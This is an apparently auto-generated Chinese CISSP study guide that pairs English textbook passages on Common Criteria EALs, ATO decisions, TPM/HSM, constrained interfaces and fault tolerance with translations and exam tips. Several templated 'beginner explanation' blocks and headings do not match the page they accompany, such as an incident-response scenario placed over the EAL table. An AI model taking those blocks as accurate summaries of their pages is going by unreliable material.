通用准则的目标如下: 增强买家对经过评估和评级的IT产品安全性的信心 消除重复评估(除此之外,这意味着如果一个国家、机构或验证组织遵循 CC标准对特定系统和配置进行评级,其他地方的组织无需重复此项工作) 持续使安全评估更具成本效益和效率 确保IT产品的评估遵循高标准且一致的规范 促进评估并提高经过评估和评级的IT产品的可用性 评估评估目标(TOE)的功能(系统做什么)和保障性(您对系统的信任程度) 通用准则流程基于两个关键要素:保护轮廓和安全目标。 保护轮廓(PPs)规 定了待评估产品(即TOE)的安全需求和保护措施,这些被视为客户的安全期 望,即“我希望”的内容。 安全目标(STs)规定了供应商在TOE中实现的安全 声明。 STs被视为供应商所“将提供”的已实施安全措施。 除了提供安全目标外, 供应商还可提供附加安全功能的组合包。 组合包是一种中间的安全需求组件分 组,可添加到TOE中或从中移除(类似于购买新车时的选装包)。 这种PP和 ST系统允许组织随着时间的推移,灵活、主观且定制化地满足其特定的安全功 能和保障要求。 组织的PP会与所选供应商的TOE的多种ST进行比较。 最接近或最佳匹配的即为 客户所购买的。

客户最初根据当前可用系统发布的或市场宣传的评估保证等级 (EALs)来选择供应商。 使用共同准则选择供应商,使客户能够精确提出其所 需的安防要求,而非必须使用静态固定的安防等级。 同时,这也为供应商在设 计和开发内容上提供了更大的灵活性。 一套完善的共同准则支持主观性和多样 性,并自动

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
学习单元 40 / PDF P526

第 526 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

adapts to changing technology and threat conditions. Furthermore, the EALs provide a method for comparing vendor systems that is more standardized (like the old TCSEC). Table 8.4 summarizes EALs 1 through 7. For a complete description of EALs, consult the CC standard documents.

中文直译 / 整理

适应不断变化的技术和威胁环境。 此外,EALs提供了一种更标准化的供应商 系统比较方法(类似于旧的TCSEC)。 表8.4总结了EAL 1至7。 有关EAL的完整描述,请参阅CC标准文档。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 526 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P527

第 527 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

TABLE 8.4 Common Criteria evaluation assurance levels Level Assurance level Description EAL1 Functionally tested Applies when some confidence in correct operation is required but where threats to security are not serious. This is of value when independent assurance that due care has been exercised in protecting personal information is necessary. EAL2 Structurally tested Applies when delivery of design information and test results are in keeping with good commercial practices. This is of value when developers or users require low to moderate levels of independently assured security. It is especially relevant when evaluating legacy systems.

EAL3 Methodically tested and checked Applies when security engineering begins at the design stage and is carried through without substantial subsequent alteration. This is of value when developers or users require a moderate level of independently assured security, including thorough investigation of TOE and its development. EAL4 Methodically designed, tested and reviewed Applies when rigorous, positive security engineering and good commercial development practices are used. This does not require substantial specialist knowledge, skills, or resources. It involves independent testing of all TOE security functions.

EAL5 Semiformally verified designed and tested Uses rigorous security engineering and commercial development practices, including specialist security engineering techniques. This applies when developers or users require a high level of independently assured security in a planned development approach, followed by rigorous development.

中文直译 / 整理

表 8.4 通用标准评估保证等级 等级 保证描述等级 EAL1 功能测试 适用于仅需对正确运行有一定信心,且安全威胁不严重的情况。 当 需要独立确认在保护个人信息方面已尽到应有的谨慎时,此等级具有价值。 EAL2 结构测试 适用于交付的设计信息和测试结果符合良好的商业惯例。 当开发者或用户需要低至中等程度的独立保证安全时, 此等级具有价值。 在评估遗留系统时尤其相关。 EAL3 系统化测试与检查 适用于安全工程从设计阶段开始并贯穿始终,且后续无重 大变更的情况。 当开发者或用户需要中等程度的独立保证安全,包括对目标 系统及其开发过程进行彻底审查时,此等级具有价值。 EAL4 系统化设计、测试和审查。 当采用严格的正向安全工程和良好的商业开发 实践时适用。 此过程不需要大量的专业知识、技能或资源。 它涉及对所有 TOE安全功能的独立测试。 EAL5 半形式化 验证 设计和测试。 采用严格的网络安全工程和商业开发实践,包括专业的安全工 程技术。 当开发者或用户在计划性开发方法中要求高水平的独立安全保障, 并随后进行严格开发时适用。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 527 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 42 / PDF P528

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Level Assurance level Description EAL6 Semiformally verified design and tested Uses the application of high assurance security engineering techniques to a rigorous development environment in order to produce a premium TOE for protecting high-value assets against significant risks. It is therefore applicable to the development of security TOEs for application in high risk situations where the value of the protected assets justifies the additional costs. EAL7 Formally verified design and tested Used only for highest-risk situations or where highvalue assets are involved. This is limited to TOEs where tightly focused security functionality is subject to extensive formal analysis and testing.

Though the CC guidelines are flexible and accommodating enough to capture most security needs and requirements, they are by no means perfect. As with other evaluation criteria, the CC guidelines do nothing to make sure that how users act on data is also secure. The CC guidelines also do not address administrative issues outside the specific purview of security. As with other evaluation criteria, the CC guidelines do not include evaluation of security in situ—that is, they do not address controls related to personnel, organizational practices and procedures, or physical security.

Likewise, controls over electromagnetic emissions are not addressed, nor are the criteria for rating the strength of cryptographic algorithms explicitly laid out. Nevertheless, the CC guidelines represent some of the best techniques whereby systems may be rated for security. Additional Common Criteria documentation is available at commoncriteriaportal.org. Visit this site to get information on the current version of the CC guidelines and guidance on using the CC along with lots of other useful, relevant information. Authorization to Operate

中文直译 / 整理

级别 保障级别 描述 EAL6 半‑ 形式化 验证 设计与 已测试 采用高保障安全应用 将工程技术和严格的开发相结合 为保护高价值资产免受重大风险而创建高品质的TOE的 环境。 因此,它适用于在高风险情境中开发安全TOE, 其中受保护资产的价值足以证明额外成本的合理性。 EAL7 形式化 已验证 设计并测试 仅用于最高风险场景或涉及高价值资产的情况。 此级别 限于那些具有高度聚焦安全功能、并接受广泛形式化分 析和测试的TOE。 尽管通用准则(CC)具有足够的灵活性和包容性,能够涵盖大多数安全需求和 要求,但它们绝非完美。 与其他评估标准一样,通用准则(CC)并不能确保用 户对数据的使用行为也是安全的。 通用准则(CC)也未涉及超出安全具体范围 的管理问题。 与其他评估标准一样,通用准则(CC)不包含对insitu安全性的 评估——即它们不涉及与人员、组织实践和程序或物理安全相关的控制措施。 同 样,电磁辐射的控制措施也未被涵盖,密码算法强度的评定标准也未明确列出。 尽管如此,通用准则(CC)仍代表了目前评估系统安全性的最佳技术之一。 更多通用准则文档请访问commoncriteriaportal.org。

访问该网站以 获取有关通用准则最新版本的信息,以及有关如何使用通用准则的指导, 还有大量其他有用的相关信息。 授权运行

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

运行授权 ATO:ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

政府/军方场景看到 ATO,要关注文档、合规和现场审查。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 43 / PDF P529

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

For many environments, it is necessary to obtain an official approval to use secured equipment for operational objectives. This is often referred to as an authorization to operate (ATO). ATO is the current term for this concept as defined by the Risk Management Framework (RMF) (see Chapter 2, “Personnel Security and Risk Management Concepts”), which replaces the previous term of accreditation. An ATO is an official authorization to use a specific collection of secured IT/IS systems to perform business tasks and accept the identified risk. The assessment and assignment of an ATO is performed by an authorizing official (AO).

An AO is an authorized entity who can evaluate an IT/IS system, its operations, and its risks, and potentially issue an ATO. NIST maintains an excellent glossary with references at csrc.nist.gov/glossary. A typical ATO is issued for 3 years (although assigned time frames vary and the AO can adjust the time frame even after issuing an ATO) and must be reobtained whenever one of the following conditions occurs: The ATO time frame has expired. The system experiences a significant security breach. The system experiences a significant security change. The AO has the discretion to determine which breaches or security changes result in a loss of ATO.

Either a modest intrusion event or the application of a substantial security patch could cause the negation of an ATO. An AO can issue four types of authorization decisions: Authorization to Operate This decision is issued when risk is managed to an acceptable level. Common Control Authorization This decision is issued when a security control is inherited from another provider and when the risk associated with the common control is at an acceptable level and already has a ATO from the same AO.

中文直译 / 整理

对于许多环境,必须获得官方批准才能使用安全设备实现运营目标。 这通常 被称为运行授权(ATO)。 ATO是风险管理体系(RMF)所定义的这一概念 的现行术语(参见第2章, “人员安全与风险管理概念”),该术语取代了之前的认证术语。 ATO 是官方 授权,允许使用特定的已安全 IT/IS 系统执行业务任务并接受已识别的风险。 ATO 的评估与授予由 授权官员(AO) 执行。 AO 是经授权的实体,能够评估 IT/IS 系统、其运行及其风险,并可能颁发 ATO。 NIST 维护了一个包含参考文献的优秀术语表,地址为 csrc.nist.gov/glossary. 典型的 ATO 有效期为 3 年(尽管分配的时间期限各不相同,且 AO 即使在 颁发 ATO 后仍可调整时间期限),当发生以下任一情况时,必须重新申请: ATO 时间期限已过期。 系统发生重大安全漏洞。 系统经历了一次重大的安全变更。 授权官有权决定哪些违规行为或安全变更会导致ATO的丧失。 无论是轻微的入 侵事件,还是应用重大安全补丁,都可能导致ATO被撤销。 授权官可以作出四种授权决定: 运营授权 当风险被管理至可接受水平时,将发出此决定。

通用控制授权 当安全控制从其他提供商继承,且与通用控制相关的风险处 于可接受水平并已获得同一授权机构(AO)的ATO时,发布此决定。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

运行授权 ATO:ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

政府/军方场景看到 ATO,要关注文档、合规和现场审查。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 44 / PDF P530

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Authorization to Use This decision is issued when a third-party provider (such as a cloud service) provides IT/IS servers that are deemed to have risk at an acceptable level; it is also used to allow for reciprocity in accepting another AO's ATO. Denial of Authorization This decision is issued when risk is unacceptable. Please see NIST SP 800-37r2 for more on the Risk Management Framework and authorization. Understand Security Capabilities of Information Systems The security capabilities of information systems include memory protection, virtualization, Trusted Platform Module (TPM), encryption/decryption, interfaces, and fault tolerance.

It is important to carefully assess each aspect of the infrastructure to ensure that it sufficiently supports security. Without an understanding of the security capabilities of information systems, it is impossible to evaluate them or implement them properly. Memory Protection Memory protection is a core security component that must be designed and implemented into an operating system. It must be enforced regardless of the programs executing in the system. Otherwise, instability, violation of integrity, denial of service, and disclosure are likely results.

Memory protection is used to prevent an active process from interacting with an area of memory that was not specifically assigned or allocated to it. Memory protection is discussed throughout Chapter 9 in relation to the topics of isolation, virtual memory, segmentation, memory management, and protection rings, as well as protections against buffer (i.e., memory) overflows. Virtualization Virtualization technology is used to host one or more operating systems within the memory of a single host computer or to run applications that are not compatible with the host OS. Virtualization can be a tool to isolate

中文直译 / 整理

使用授权 当第三方提供商(如云服务)提供的IT/IS服务器被认为风险处于 可接受水平时,发布此决定; 此外,也用于认可其他授权机构(AO)的 ATO的互认。 授权拒绝 当风险不可接受时,发布此决定。 有关风险管理体系的更多信息,请参阅 NIST SP 800‑37r2 和授权。 了解信息系统的安全能力 信息系统的安全能力包括内存保护、虚拟化、可信平台模块(TPM)、加密/ 解密、接口和容错。 必须仔细评估基础设施的每个方面,以确保其充分支持安 全性。 如果不了解信息系统的安全能力,就无法对其进行评估或正确实施。 内存保护 内存保护是操作系统中必须设计和实现的核心安全组件。 无论系统中执行的是 何种程序,都必须强制实施内存保护。 否则,系统很可能出现不稳定、完整性 被破坏、服务拒绝和信息泄露等问题。 内存保护用于防止正在运行的进程与未 被明确分配或分配给它的内存区域进行交互。 内存保护在第9章中与隔离、虚拟内存、分段、内存管理和保护环,以及针对缓 冲区(即内存)溢出的防护措施相关联进行讨论。 虚拟化 虚拟化技术用于在单台主机计算机的内存中托管一个或多个操作系统,或运 行与主机操作系统不兼容的应用程序。

虚拟化可以作为一种隔离工具

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 45 / PDF P531

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

operating systems, test suspicious software, or implement other security protections. See Chapter 9 for more information about virtualization. Trusted Platform Module (TPM) The Trusted Platform Module (TPM) is both a specification for a cryptoprocessor chip on a mainboard and the general name for the implementation of the specification. A TPM can be used to implement a broad range of cryptography-based security protection mechanisms. A TPM chip is often used to store and process cryptographic keys for a hardwaresupported or OS-implemented local storage device encryption system. A TPM is an example of a hardware security module (HSM).

An HSM is a cryptoprocessor used to manage and store digital encryption keys, accelerate crypto operations, support faster digital signatures, and improve authentication. An HSM can be a chip on a motherboard, an external peripheral, a network-attached device, or an extension card (which is inserted into a device, such as a router, firewall, or rack-mounted server blade). HSMs include tamper protection to prevent their misuse even if an attacker gains physical access. Interfaces A constrained or restricted interface is implemented within an application to restrict what users can do or see based on their privileges.

Users with full privileges have access to all the capabilities of the application. Users with restricted privileges have limited access. Applications constrain the interface using different methods. A common method is to hide the capability if the user doesn't have permission to use it. Commands might be available to administrators via a menu or by rightclicking an item, but if a regular user doesn't have permissions, the command does not appear. Other times, the command is shown but is dimmed or deactivated. The regular user can see it but will not be able to use it. The purpose of a constrained interface is to limit or restrict the actions of both authorized and unauthorized users.

The use of such an interface is a practical implementation of the Clark–Wilson model of security. Fault Tolerance Fault tolerance is the ability of a system to suffer a fault but continue to operate. Fault tolerance is achieved by adding redundant components such as

中文直译 / 整理

操作系统、测试可疑软件或实现其他安全保护。 请参阅第9章了解有关虚拟化 的更多信息。 可信平台模块(TPM) 可信平台模块(TPM)既是一种用于主板上密码处理器芯片的规范,也是该规 范实现的通用名称。 TPM 可用于实现广泛的基于密码学的安全保护机制。 TPM 芯片通常用于存储和处理硬件支持或操作系统实现的本地存储设备加密系 统的加密密钥。 TPM 是硬件安全模块(HSM)的一个示例。 HSM 是一种用于 管理与存储数字加密密钥、加速密码运算、支持更快的数字签名以及增强身份 验证的密码处理器。 HSM 可以是主板上的芯片、外部外设、网络附加设备或 扩展卡(插入到路由器、防火墙或机架式服务器刀片等设备中)。 HSM 包含 防篡改保护,即使攻击者获得物理访问权限,也能防止其被滥用。 接口 在应用程序中实现了一个 受限 或 受限接口,以根据用户的权限限制其可执行 的操作或可查看的内容。 拥有完整权限的用户可以访问应用程序的所有功能, 而权限受限的用户则只能访问有限的功能。 应用程序使用不同的方法约束界面。 一种常见方法是当用户没有使用权限时隐 藏该功能。

命令可能通过菜单或右键单击项目对管理员可用,但如果普通用户 没有权限,则该命令不会显示。 有时,命令会显示但处于灰显或停用状态。 普 通用户可以看到它,但无法使用。 受限界面的目的是限制授权用户和非授权用户的操作。 这种界面的使用是 Clark–Wilson安全模型的实际实现。 容错性 容错是指系统在发生故障时仍能继续运行的能力。 容错通过添加冗余组件来实现, 例如

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 46 / PDF P532

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

additional disks within a redundant array of independent disks (RAID) (aka redundant array of inexpensive disks [RAID]) array, or additional servers within a failover clustered configuration. Fault tolerance is an essential element of security design. It is also considered part of avoiding single points of failure and the implementation of redundancy. For more details on fault tolerance, redundant servers, RAID, and failover solutions, see Chapter 18, “Disaster Recovery Planning.” Encryption/Decryption Encryption is the process of converting plaintext to ciphertext, whereas decryption reverses that process.

Symmetric and asymmetric methods of encryption and decryption can be used to support a wide range of security solutions to protect confidentiality and integrity. Please see the full coverage of cryptography in Chapters 6 and 7. Manage the Information System Life Cycle Managing the information system life cycle is a comprehensive process that involves various stages, each with specific activities and considerations. Managing the information system life cycle involves a structured and organized approach to developing, deploying, and maintaining an information system.

The typical stages of the information system life cycle are: Stakeholders' Needs and Requirements This initial phase focuses on identifying and understanding the needs, expectations, and requirements of stakeholders who will interact with the information system. It encompasses a thorough analysis of the diverse set of requirements presented by end users, managers, regulatory bodies, and other relevant parties. Requirements Analysis This phase involves a detailed examination of these requirements, including determining both functional and nonfunctional requirements, considering constraints, and ensuring alignment with the overall goals of the organization.

Architectural Design In this phase, a blueprint for the information system is created, defining the overall structure, components, modules, data flow, and interfaces of the system.

中文直译 / 整理

冗余独立磁盘阵列(RAID)中的额外磁盘(也称为廉价磁盘冗余阵列[RAID]) 阵列,或故障切换集群配置中的额外服务器。 容错是安全设计的基本要素,也 被视为避免单点故障和实现冗余的一部分。 有关容错、冗余服务器、RAID 和 故障切换解决方案的更多详细信息,请参阅第 18 章“灾难恢复规划”。 加密/解密 加密是将明文转换为密文的过程,而解密则是逆转该过程。 对称和非对称加密 与解密方法可用于支持广泛的安全解决方案,以保护机密性和完整性。 有关密 码学的完整内容,请参见第6章和7。 管理信息系统生命周期 管理信息系统生命周期是一个综合过程,涉及多个阶段,每个阶段都有特定的 活动和考量。 管理信息系统生命周期需要采用结构化和有组织的方法来开发、 部署和维护信息系统。 信息系统生命周期的典型阶段包括: 利益相关者的需求和要求 此初始阶段侧重于识别和理解将与信息系统交互 的利益相关者的需求、期望和要求。 它涵盖了对最终用户、管理者、监管机 构及其他相关方提出的多样化需求的全面分析。 需求分析 此阶段涉及对这些需求的详细审查,包括确定功能性和非功能性 需求,考虑约束条件,并确保与组织的总体目标保持一致。

架构设计 在此阶段,将创建信息系统的蓝图,定义系统的整体结构、组件、 模块、数据流和接口。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 47 / PDF P533

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

